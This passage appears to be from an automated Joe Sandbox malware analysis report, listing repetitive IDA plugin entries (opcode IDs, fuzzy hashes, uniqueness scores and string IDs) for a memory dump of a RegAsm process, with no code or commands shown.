                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1d8d16344228d71fdfe9bb3bc8d358b8b5cc0064b89813248f97e7bfbc0f24d0
                                                                                                                                                    • Instruction ID: a31a6532902fbd990d4e90528f7b7e9394ee5cacd26c945016275861547048fa
                                                                                                                                                    • Opcode Fuzzy Hash: 1d8d16344228d71fdfe9bb3bc8d358b8b5cc0064b89813248f97e7bfbc0f24d0
                                                                                                                                                    • Instruction Fuzzy Hash: D6E06DB310C2119FD701DA60F84489B7BE8EB91220B198C6EE445C7241E631D942C766
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 725f41d68f430951a21533ef158d5ec410536499d6d09fe05b9dc126b69a1c74
                                                                                                                                                    • Instruction ID: 58a8da9063b74a5f5e3e22a29a989b2f205a2a989f500aae63b3f676f8ad2d2c
                                                                                                                                                    • Opcode Fuzzy Hash: 725f41d68f430951a21533ef158d5ec410536499d6d09fe05b9dc126b69a1c74
                                                                                                                                                    • Instruction Fuzzy Hash: A8F09038504B058FE715EF26E449512BFF6FB88311700C62EE48B82A10DF74A44ACF84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ca394b233eebe6c31a439c2e5ef74d70c66e1b8c6ce0dbe244ba5475820bd97c
                                                                                                                                                    • Instruction ID: 1798b987fd020e89ced7ce7489351dc3c9aead4bc6393ab896ff12dee7c2dc13
                                                                                                                                                    • Opcode Fuzzy Hash: ca394b233eebe6c31a439c2e5ef74d70c66e1b8c6ce0dbe244ba5475820bd97c
                                                                                                                                                    • Instruction Fuzzy Hash: B0E0A0342047548FD320A729E409BAF7FE69B81215F040529E1468B701DFA568058792
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 60cac553b0b4c91ddfd8d0e322fa476b65da8cb14e9f59786c333743649a9ee7
                                                                                                                                                    • Instruction ID: aa7bca569430099a9d7a98d30b391740d73ad7b710162ec54592c1075dc0fb16
                                                                                                                                                    • Opcode Fuzzy Hash: 60cac553b0b4c91ddfd8d0e322fa476b65da8cb14e9f59786c333743649a9ee7
                                                                                                                                                    • Instruction Fuzzy Hash: DBE0DF779042004FCB1AB220ED929583BB2E7466003875187D841AF2B5DA186E0E8BD2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f25e590968857f4af611c2c10df242a24b22d09c6663e649efd51479f1ae1619
                                                                                                                                                    • Instruction ID: c91fa52dd1432f5ca59934f5f59b3f5c35ae9b94d801829563b6fb92522e300d
                                                                                                                                                    • Opcode Fuzzy Hash: f25e590968857f4af611c2c10df242a24b22d09c6663e649efd51479f1ae1619
                                                                                                                                                    • Instruction Fuzzy Hash: 60E06D35C5454EABCB01CFF4D9058CDBF75EB01344B1483E6E82596291EA351B06DF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3655b41d20007cb11663a78d4f7b596881e8bcc590050605ecce8d61fffe312d
                                                                                                                                                    • Instruction ID: 90b3af28a2b6806ff58355d824ad8fb9dbc37838a5e996e3f3a8a6fd3394989a
                                                                                                                                                    • Opcode Fuzzy Hash: 3655b41d20007cb11663a78d4f7b596881e8bcc590050605ecce8d61fffe312d
                                                                                                                                                    • Instruction Fuzzy Hash: 2EE08C32A101108FE701FA24F842BAA77A1E785A21F50D531E000ABF89CA38580E8B81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-2692801833
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-2692801833
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j$D[j
                                                                                                                                                    • API String ID: 0-896334709
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd